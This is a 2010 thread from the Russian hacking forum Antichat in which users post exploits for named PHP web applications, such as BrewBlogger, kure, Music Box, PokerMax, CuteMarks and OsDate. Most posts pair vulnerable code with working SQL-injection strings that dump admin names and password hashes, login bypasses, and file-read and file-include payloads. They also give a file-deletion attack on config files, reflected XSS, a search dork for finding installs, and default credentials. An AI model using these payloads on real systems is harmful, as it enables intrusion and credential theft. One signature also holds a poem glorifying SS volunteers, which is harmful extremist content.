Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
21.04.2010, 02:44
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660
Репутация:
1148
|
|
brewblogger 2.2.0
Blind SQL inj
index.php
PHP код:
require_once ('Connections/config.php');
require ('includes/authentication_nav.inc.php'); session_start();
include ('includes/db_connect_universal.inc.php');...
/includes/authentication_nav.inc.php
PHP код:
mysql_select_db($database_brewing, $brewing);
$query_user = sprintf("SELECT * FROM users WHERE user_name = '%s'", $loginUsername);
$user = mysql_query($query_user, $brewing) or die(mysql_error());
$row_user = mysql_fetch_assoc($user);
$totalRows_user = mysql_num_rows($user);...
/includes/db_connect_universal.inc.php
PHP код:
// Get server's PHP version
$phpVersion = phpversion();
//echo $phpVersion;
$currentPage = "http://".$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME'];
if (!empty($_SERVER["QUERY_STRING"])) $currentPage .= "?".$_SERVER['QUERY_STRING'];
$loginUsername = $_SESSION["loginUsername"];
target:index.php
Условие:
rg=on;
mg=off.
Опять в куки, например, тулим:
; loginUsername=h' and (select 1 from (select count(0),concat(version(),floor(rand(0)*2)) from (select 1 union select 2 union select 3)x group by 2)a)#
Пароли и логины в таблице users:
user_name password
Рабочий запрос (проверил на 5.1.40-community):
; loginUsername=h' and (select 1 from (select count(0),concat_ws(0x3a,(select user_name from users limit 0,1),(select password from users limit 0,1),floor(rand(0)*2)) from (select 1 union select 2 union select 3)x group by 2)a)#
Blind SQL inj
/includes/db_connect_universal.inc.php
PHP код:
// User Info
mysql_select_db($database_brewing, $brewing);
$query_user5 = sprintf("SELECT * FROM users WHERE user_name = '%s'", $filter);
$user5 = mysql_query($query_user5, $brewing) or die(mysql_error());
$row_user5 = mysql_fetch_assoc($user5);
$totalRows_user5 = mysql_num_rows($user5);...
need:
rg=on;
mg=off
target:index.php
Result:
в куки, напр.:
; filter=h' and (select 1 from (select count(0),concat_ws(0x3a,(select user_name from users limit 0,1),(select password from users limit 0,1),floor(rand(0)*2)) from (select 1 union select 2 union select 3)x group by 2)a)#
blind SQL inj (в order by)
includes/db_connect_universal.inc.php
PHP код:
...
if ($page == "brewBlogList") {
if ($filter == "all") {
mysql_select_db($database_brewing, $brewing);
$query_log = sprintf("SELECT * FROM brewing ORDER BY %s %s", $sort, $dir);
$log = mysql_query($query_log, $brewing) or die(mysql_error());
$row_log = mysql_fetch_assoc($log);
$totalRows_log = mysql_num_rows($log);
}...
PHP код:
...if ($page == "brewBlogList") $dir = "DESC";
else $dir = "ASC";
if (isset($_GET['dir'])) {
$dir = (get_magic_quotes_gpc()) ? $_GET['dir'] : addslashes($_GET['dir']);...
PHP код:
...$page = $row_pref['home'];
if (isset($_GET['page'])) {
$page = (get_magic_quotes_gpc()) ? $_GET['page'] : addslashes($_GET['page']);
}...
PHP код:
...elseif ($page == "brewBlogList") $sort = "brewDate";...
need only:
rg=on 
Reslult:
http://localhost/brewblogger2.2.0/index.php?page=brewBlogList&dir=[SQL]
http://localhost/brewblogger2.2.0/index.php?page=brewBlogList&dir=,%28select%201%20f rom%20%28select%20count%280%29,concat_ws%280x3a,%2 8select%20user_name%20from%20users%20limit%200,1%2 9,%28select%20password%20from%20users%20limit%200, 1%29,floor%28rand%280%29*2%29%29%20from%20%28selec t%201%20union%20select%202%20union%20select%203%29 x%20group%20by%202%29a%29#
Duplicate entry 'admin:21232f297a57a5a743894a0e4a801fc3:1' for key 'group_key'
Крутил как блинд, походу принтабельных нет(кажысь)!
Дальше по тексту есть иньекции при rg=on!
SQL inj
УРЯ!
Поиск принтабельной скули закнончился успехом!
target: our_site/sections/entry.inc.php?action=hack
/sections/entry.inc.php
Вот куски:
PHP код:
...if ($action == "default") {
$style = "default";
if (isset($_GET['style'])) {
$style = (get_magic_quotes_gpc()) ? $_GET['style'] : addslashes($_GET['style']);
}
} else
$style = $_POST['style'];...
PHP код:
...mysql_select_db($database_brewing, $brewing);
$query_style1 = sprintf("SELECT * FROM styles WHERE brewStyle = '%s'", $style);
$style1 = mysql_query($query_style1, $brewing) or die(mysql_error());
$row_style1 = mysql_fetch_assoc($style1);
$totalRows_style1 = mysql_num_rows($style1);...
need:
mg=off
Result:
<form action="http://localhost/brewblogger2.2.0/sections/entry.inc.php?action=hack" method="post">
<input type="text" name="style" value="' union select 1,user_name,password,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17 from users-- ">
<input type=submit value="ok">
</form>
ps
иследовал не полностю!
Последний раз редактировалось Strilo4ka; 21.04.2010 в 03:09..
|
|
|
21.04.2010, 12:27
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660
Репутация:
1148
|
|
kure 0.6.2Читалка
/config.php
PHP код:
...$config['adminpass'] = "21232f297a57a5a743894a0e4a801fc3";...
/index.php
PHP код:
.../***** VIEWPOST/VIEWDOC *****/
elseif(isset($_GET['post']) || isset($_GET['doc'])) { // if a post/doc has been requested
if(isset($_GET['post'])) {
$type = "post";
$filename = $_GET['post'];
} else {
$type = "doc";
$filename = $_GET['doc'];
}
plug($type, "top");
if(!file_exists($type . "s/" . $filename . ".txt")) {
print("The requested file <tt>" . $type . "s/" . $filename . ".txt</tt> does not exist.\n");
} else {
$file = $type . "s/" . $filename . ".txt";
$title = $file;
$title = str_replace($type . "s/", "", $title);
$title = str_replace(".txt", "", $title);
$uftitle = $title;
$title = str_replace("_", " ", $title);
$content = str_replace("\n", "<br>\n", file_get_contents($file));
print("<table align=\"center\" width=\"90%\"><tr>\n");
print("<td width=\"100%\">\n");
print("<a class=\"blog_title\" href=\"?" . $type . "=" . $uftitle . "\" name=\"" . $title . "\">" . $title . "</a>\n");
plug($type, "title_after");
print("<br>\n");
if(($type == "doc" && $config['docdates'] == true) || $type == "post") {
print("<span class=\"blog_date\">" . date("F jS, Y", filemtime($file)) . "</span>\n");
plug($type, "date_after");
print("<br>\n");
}
print("</td></tr>\n");
print("<tr><td width=\"100%\"><br>\n");
print("<span class=\"blog_content\">\n" . $content . "\n</span>");
plug($type, "body_after");
print("<br><br>\n");
print("</td></tr>\n");
print("</table>\n");
}
}...
Result:
http://localhost/kure-0.6.2/index.php?post=../config.php%00
админко - admin/
пасивная XSS
/index.php
PHP код:
...plug($type, "top");
if(!file_exists($type . "s/" . $filename . ".txt")) {
print("The requested file <tt>" . $type . "s/" . $filename . ".txt</tt> does not exist.\n");...
Result:
http://localhost/kure-0.6.2/index.php?post=%3Cscript%3Ealert%28123%29%3C/script%3E
Дорк: powered by kure
Последний раз редактировалось Strilo4ka; 21.04.2010 в 13:57..
|
|
|
|
21.04.2010, 14:00
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
Music Box v 3.3 
SQL:
/news.php?action=edit&newsid=-1+union+select+1,2,3,4,5+--+
/album.php?eid=-1+union+select+1,2,3,4,5,6,7,8,9,10+--+
/blog-detail.php?id=-1+union+select+1,2,3,4,5+--+
/genre_albums.php?id=-1+or(1,1)=(select+count(0),concat((select+database ()+from+information_schema.tables+limit+0,1),floor (rand(0)*2))from(information_schema.tables)group+b y+2)--+
/news-detail.php?id=-1+union+select+1,2,3,4,5+--+
/songs.php?eid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19+--+
Need mq off:
/images.php?type=album&aid=-1'+union+select+version()+--+
(<img src=5.0.45-community-nt>)
Пассивная XSS:
/download_songs.php?song=-1%22%3E%3Csсriрt%3Ealert();%3C/sсriрt%3E // Хотя это скуля, ну крутить я нехочу)
/mygpic.php?picname=%3C/title%3E%3Csсriрt%3Ealert();%3C/sсriрt%3E
/news-detail.php?id=%22%3E%3Csсriрt%3Ealert();%3C/sсriрt%3E
Need Register_globals:
/directlinking.php?count=1&filename=%22%3E%3Csсri t%3Ealert();%3C/sсriрt%3E
Скачиваем любой файл:
/forcedownload.php?file=sources/configure.php -- Качаем
/forcedownload.php?file=sources/configure.php%00 -- Смотрим в браузере
/streamm3u.php?file=sources/configure.php -- Скачается в формате m3u 
Раскрытие:
/opendir.php
" Мы разработчики MusicBox, и мы дураки, взяли блин не поставили проверку на авторизацию, или мы не дураки и оставили эти баги для траффа для хекеров, кароче какую песню хотите такую и редактируйте!"
/songs.php?eid=1
Льём шелл:
/up.php -- помоему баян, видел где-то По дефолту в /audio/ -- На офф сайте стадо баранов уже видать в теме что залиться через этот файл можно, так что делетнут он там
// Вы чо гоните, это лишь одна часть файлов, я блин обосрался когда по другим файлам ходил.
Последний раз редактировалось Ctacok; 21.04.2010 в 15:26..
|
|
|
|
21.04.2010, 15:47
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660
Репутация:
1148
|
|
Bling Web LogSQL ing
target: index.php
index.php
PHP код:
...if (!$staffid)
{
echo "<font size=2>Signup for an account <a href=\"signup.php\">here</a><br> if you dont already have one.\n";
echo "<br><p>\n";
echo "<form name=elform action=login.php method=post>\n";
echo "<table cellpadding=0 cellspacing=0>\n";
echo "<tr>\n";
echo "<td class=body>Username: </td>\n";
echo "<td><input type=text name=handle size=15></td>\n";
echo "</tr>\n";
echo "<tr>\n";
echo "<td class=body>Password: </td>\n";
echo "<td><input type=password name=password size=15></td>\n";
echo "</tr>\n";
echo "</table>\n";
echo "<br>\n";
echo "<center><input type=submit value=Login></center>\n";
echo "</form>\n";
}...
Обработчик формы: login.php
PHP код:
...include("./includes/inc.php");
$handle=cleanup($handle);
$password=md5($password);
$staffinfo=getrow("select id, handle, level
from staff where handle='$handle' and status=7 and password='$password'");
$staffid=$staffinfo['id'];
if(!$staffid)
{
header ("location:index.php?error=baddlogin");
exit();
}
$staffname=$staffinfo['handle'];
$stafflevel=$staffinfo['level'];...
includes/inc.php
PHP код:
include("./includes/bling_config.php");
include("./includes/functions.php");
include/blind_config.php
PHP код:
function getrows($query)
{
$query=stripSlashes($query);
if (!$result=mysql_query($query))
die(deadjim(mysql_errno(), mysql_error(), $query));
else
{
$row_array[0][0]=$rows=mysql_num_rows($result);
$row_array[0][1]=$fields=mysql_num_fields($result);
for ($i=1; $i<=$rows; $i++)
{
$row_array[$i]=mysql_fetch_array($result);
}
mysql_free_result($result);
}
return $row_array;
}...
PHP код:
...function cleanup($copy)
{
$copy=trim($copy);
//$copy=htmlspecialchars($copy, ENT_QUOTES);
//$copy=eregi_replace ("%", "%", $copy);
//$copy=eregi_replace ("<", "<", $copy);
//$copy=eregi_replace ("&", "&", $copy);
//$copy=eregi_replace("<b", "<b", $copy);
//$copy=eregi_replace("</b", "</b", $copy);
//$copy=eregi_replace("<i", "<i", $copy);
//$copy=eregi_replace("</i", "</i", $copy);
//$copy=eregi_replace("<u", "<u", $copy);
//$copy=eregi_replace("</u", "</u", $copy);
//$copy=eregi_replace("<a", "<a", $copy);
//$copy=eregi_replace("</a", "</a", $copy);
//$copy=eregi_replace("<img","<img", $copy);
$copy=nl2br($copy);
$copy=StripSlashes($copy);
return($copy);
}...
Result:
в поле с логином admin' or 1=1/*
пасс любой
ps
Скрипт древний, потому работает тока с rg=on
В гугле вроде ниче небыло по уязвимостям!
Последний раз редактировалось Strilo4ka; 22.04.2010 в 01:30..
|
|
|
|
21.04.2010, 22:11
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210
Репутация:
2017
|
|
Покер - ЭТО ЗЛО :)
PokerMax Poker
не понял я что за покер там, искал себе сорцы поиграть
SQL
Условия: MQ = off
файл : pokerleague_.php (везде может отличаться название)
PHP код:
$plrows = $sql->execute ( "SELECT * FROM ".$player_table." WHERE playerid='" . $cgi->getValue ( "pid" ) . "'",
sploit :
PHP код:
http://localhost/pokerleague/pokerleague_.php?op=showplayer&pid=-Salcifuful%27+/*!UNION*/+SELECT+1,2,concat_Ws%280x3a,username,password%29,4,5,6,7,8,9,10+from+pokermax_admin%23
Админко хек
Условия: MQ = off
Файл : index.php (он же логиниться)
PHP код:
if (isset($_POST["op"]) && ($_POST["op"]=="adminlogin"))
{
mysql_connect($server, $DBusername, $DBpassword) or die ("$DatabaseError");
mysql_select_db($database);
$query = "SELECT * FROM $admin_table WHERE username='".$_POST['username']."' AND password='".$_POST['password']."'";
splot:
Код:
ну собственно идем в админку и
login: ' or 1=1%23
pass: anoxyi4to xoTb 3DECb 6bl/\ Bac9|
Удалим что нить?
в админке файл : backup.php (Делает бэкупс)
PHP код:
unlink($backup_dir."/" . getParam("delzip",""));
$backup_dir - по умолчанию вроде backup
такссс....ни че не фильтруется и т.д. ->
делаем
Sploit :
Код:
http://localhost/pokerleague/pokeradmin/backup.php?delzip=../../includes/config.php
(кол-во ../ может отличаться от здесьнаписаного)
по замысловатому замыслу он удалится
ЗЫ там еще скули в админке, думаю они не так важны уже
ЗЫЫ иногда прокатывает в админку зайти с
login:admin
pass:admin
__________________
В сырых могилах Второй Мировой
Солдатам снятся цветные сны.
Их кости порой видны под первой травой,
Когда сойдет снег в начале весны.
Славяне тоже сражались в отрядах СС
За чистоту арийской крови.
Теперь они дремлют за чертою небес,
Но снова встанут на бой, лишь позови.
|
|
|
|
22.04.2010, 00:57
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660
Репутация:
1148
|
|
CuteMarks 1.0.2
Blind SQL inj
(если условие верно, то редирект!)
link_href.php
PHP код:
include "./include/config.inc";
include "./include/cm_functions.inc";
#Get the superglobal variable(s) before using them:
$lnk_id = $_GET['lnk_id'];
# Make database connection and construct admin main screen
mysql_pconnect("$db_address:$db_port", $db_user, $db_password) or db_error;
mysql_select_db($db_name) or db_error;
# An empty database produces a special message
$sql = "SELECT lnk_url, lnk_hits FROM cm_links WHERE lnk_id=$lnk_id";
$return = mysql_query($sql) or db_error;
$row = mysql_fetch_array($return) or db_error;
$url = $row[0];
$hits = $row[1] + 1;
$sql = "UPDATE cm_links SET lnk_hits = $hits WHERE lnk_id=$lnk_id";
mysql_query($sql) or db_error;
header("Location: $url");
include/cm_functions.php
PHP код:
function db_error($exit_flag) {
echo "A database error occured, please try again<br>";
$exit_flag AND exit;
Result:
http://localhost/cutemarks_1-0-2/link_href.php?lnk_id=[sql]
http://localhost/cutemarks_1-0-2/link_href.php?lnk_id=1+and+4=substring%28version%2 8%29,1,1%29--+
SQL inj
PHP код:
include "./include/config.inc";
include "./include/template.inc";
$lnk_id = $_GET['lnk_id'];
# Load the template, retreive information from the database and fill
# in the template
mysql_pconnect("$db_address:$db_port", $db_user, $db_password) or db_error;
mysql_select_db($db_name) or db_error;
$sql = "SELECT lnk_parent_id, lnk_name FROM cm_links WHERE lnk_id = $lnk_id";
$result = mysql_query($sql) or db_error;
$row = mysql_fetch_array($result) or db_error;
$tpl = new Template("./$tpl_path", "remove");
$tpl->set_file("admin_move_lnk", "admin_move_lnk.tpl");
$tpl->set_block("admin_move_lnk", "cat_list", "foo");
$tpl->set_var(array ("CSS_FILE" => $css_file,
"lnk_name" => htmlentities($row[1]),
"node_exp" => $node_exp,
"lnk_id" => $lnk_id ));
$pID = $row[0];
# Create a pulldown form element with all available categories
$sql = "SELECT cat_id, cat_name FROM cm_categories ORDER BY cat_name";
$result = mysql_query($sql) or db_error;
while ($row = mysql_fetch_array($result)) {
$tpl->set_var(array("cat_id" => $row[0],
"cat_label" => $row[1]));
if ($row[0] == $pID) {
$tpl->set_var("cat_selected", "selected");
} else {
$tpl->set_var("cat_selected", "");
}
$tpl->parse("foo", "cat_list", TRUE);
}
$tpl->pparse("out", "admin_move_lnk");
Result:
http://localhost/cutemarks_1-0-2/admin_move_lnk.php?lnk_id=[sql]
http://localhost/cutemarks_1-0-2/admin_move_lnk.php?lnk_id=-1+union+select+1,version%28%29
You want to move the link "5.1.40-community" to a new category. Please choose one of the available categories from the list and submit the change.
SQL inj
admin_rename_cat.php
PHP код:
include "./include/config.inc";
include "./include/template.inc";
$cat_id = $_GET['cat_id'];
$node_exp = $_GET['node_exp'];
# Load the template, retreive information from the database and fill
# in the template
mysql_pconnect("$db_address:$db_port", $db_user, $db_password) or db_error;
mysql_select_db($db_name) or db_error;
$sql = "SELECT cat_name FROM cm_categories WHERE cat_id = $cat_id";
$result = mysql_query($sql) or db_error;
$row = mysql_fetch_array($result) or db_error;
$tpl = new Template("./$tpl_path", "remove");
$tpl->set_file("admin_rename_cat", "admin_rename_cat.tpl");
$tpl->set_var(array ("CSS_FILE" => $css_file,
"cat_name" => htmlentities($row[0]),
"node_exp" => $node_exp,
"cat_id" => $cat_id ));
$tpl->pparse("out", "admin_rename_cat");
Result:
http://localhost/cutemarks_1-0-2/admin_rename_cat.php?cat_id=[sql]
http://localhost/cutemarks_1-0-2/admin_rename_cat.php?cat_id=-1+union+select+version%28%29--+
Дырявый как # дальше не хочеться смотреть!
Последний раз редактировалось Strilo4ka; 22.04.2010 в 01:51..
|
|
|
|
22.04.2010, 21:09
|
|
Познающий
Регистрация: 21.02.2009
Сообщений: 54
Провел на форуме:
1224548
Репутация:
134
|
|
OsDate CMS
Сайт: http://www.tufat.com/
Версия: 2.54, последняя на данный момент.
Информация о таблицах:../dbtest.php
Таким образом можно узнать префикс.
PHP-Info:
../admin/phpinfo.php
(права не нужны)
Раскрытия путей:
есть папка с именем forum, в ней лежат api для взаимодействия с установленными форумами, если же форумов нет, то выдаёт самые разнообразные ошибки(инклюд несуществующих файлов, ввызовы несуществующих функций) с раскрытием путей.
Список файлов:
../forum/smf_1-1_api.php
../forum/adminLogin.php
../forum/forum_db.php
../forum/myBB14_forum.php
../forum/myBB_forum.php
../forum/Phorum_forum.php
../forum/phpBB3_forum.php
../forum/phpBB_forum.php
../forum/smf11_forum.php
../forum/vBulletin_forum.php
../forum/userLogin.php
Также другие файлы:
../news.php?config[no_news]=asdf
../test.php
../chat/inc/cmses/osdateCMS_v25.php
XSS(пассивная):
../afflogin.php?errormsg=<sCript>alert(111);</sCript>
Отсутствует фильтрация.
RFI(register globals = On):../forum/adminLogin.php?config[forum_installed]=http://site/index.php%00
../forum/userLogin.php?config[forum_installed]=../../../../../../../../../etc/passwd%00
Code:
PHP код:
if ( $config['forum_installed'] == '' || $config['forum_installed'] == 'None' ) {
include_once('None_forum.php');
} else {
include_once($config['forum_installed'] . '_forum.php');
}
Ранее уже выкладывалась.
|
|
|
|
24.04.2010, 17:16
|
|
Познающий
Регистрация: 21.02.2009
Сообщений: 54
Провел на форуме:
1224548
Репутация:
134
|
|
Plume CMS 1.2.4
Версия: 1.2.4 Final
RFI(register globals = on и, как я понял, сервер на винде, тк в Юникс системах регистр имеет значение):
/manager/tools/link/dbinstall.PhP?_PX_config[manager_path]=path%00
Уязвимый код:
PHP код:
if (basename($_SERVER['SCRIPT_NAME']) == 'dbinstall.php') exit;
include $_PX_config[manager_path] . "/path/lib/";
Саму идею обойти защиту путём изменения регистра предложили в этом посту: https://forum.antichat.ru/showpost.php?p=1704870&postcount=234 , однако порой этот файл редактируют, а ведь точно такая же уязвимость есть и в файле, указанном выше.
Раскрытия путей:
В папке ../manager/tools/* в каждой папке выдает ошибку, связанную с тем, что они используют функции, определённый в файлах, которые их подключают.
../manager/help.php?c[]=article&mode=
../manager/users.php?user_id[]=1
../manager/comments.php?op=all'
XSS(passive):
../manager/tools/visualedit/index.php?msg="><sCript>alert(111);</sCript>
SQL-иньекция(админка):
../manager/tools.php?p=link&id=-4+union+select+1,2,3,4,5,6,7&page=edit_link
Также можно узнать версию движка, обратившись к файлу, указанному ниже:
../manager/VERSION
Последний раз редактировалось _iks_; 24.04.2010 в 23:12..
|
|
|
|
27.04.2010, 23:07
|
|
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740
Репутация:
912
|
|
product:cms id 1.1.1
site:www.cmsid.co.cc
1)SQL-injection
file:application/views/views.php
PHP код:
$id=$_GET['id'];
$hasil = mysql_query("select * from id_views where id=$id");
result:
Код:
/index.php?application=views&id=-9+union+select+1,2,concat_ws(0x3a,name,password),4,5,6+from+id_users+--+
2)SQL-injection
file: application/moduls/news/news.php
PHP код:
case 'views':
$id=$_GET['id'];
$hasil = mysql_query("select * from id_news where id=$id");
result:
Код:
index.php?application=moduls&type=news&action=views&id=-14+union+select+1,2,concat_ws(0x3a,name,password),4,5,6,7,8,9,10,11,12,13+from+id_users+--+
3)LFI(требования: mq=off)
file: index.php
бесит отсутствие отступов ><
PHP код:
switch($_GET['application']) {
....
case 'moduls':
if (file_exists(dir_modul.$_GET['type'].'/'.$_GET['type'].'.php'))
{
require_once(dir_modul.$_GET['type'].'/'.$_GET['type'].'.php');
}else {
header("location:index.php");
exit;
}
break;
result:
Код:
/index.php?application=moduls&type=../../[local_file]%00
Последний раз редактировалось .:[melkiy]:.; 27.04.2010 в 23:10..
|
|
|
|
28.04.2010, 11:33
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
Suppy 0.5.4
Suppy 0.5.4
Suppy is a small supportsystem based on PHP and MySQL. Beta !
Homepage: http://sourceforge.net/projects/suppy/
Пассивная XSS:
/login.php?error=%3Cscript%3Ealert();%3C/script%3E
Auth ByPass
/login.php
В Anmeldename:
1' or 1=1 /*
Passwort:
12345
Exploit:
PHP код:
<form method="post" action="http://site.com/login.php">
<input name="name" type="text" value="1' or 1=1 -- " />
<input name="pw" type="password" value="Ulalala"/>
<input name="login" type="submit" value="Login" />
SQL Inj:
/bb/getfile.php?id=-1+union+select+1,2,3,4,5,6,7,8+--+
Code:
PHP код:
if(isset($_GET['id']) && isset($_SESSION['ID_user']))
{
include_once('utils/dbcon.php');
$con = new DBcon();
$con->AddSQL("SELECT * FROM file ");
$con->AddSQL("WHERE ID_file=".$_GET['id']);
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для .:[melkiy]:.](/avatars/avatar74910.gif){kind=avatar}
Похожие темы
Линейный вид
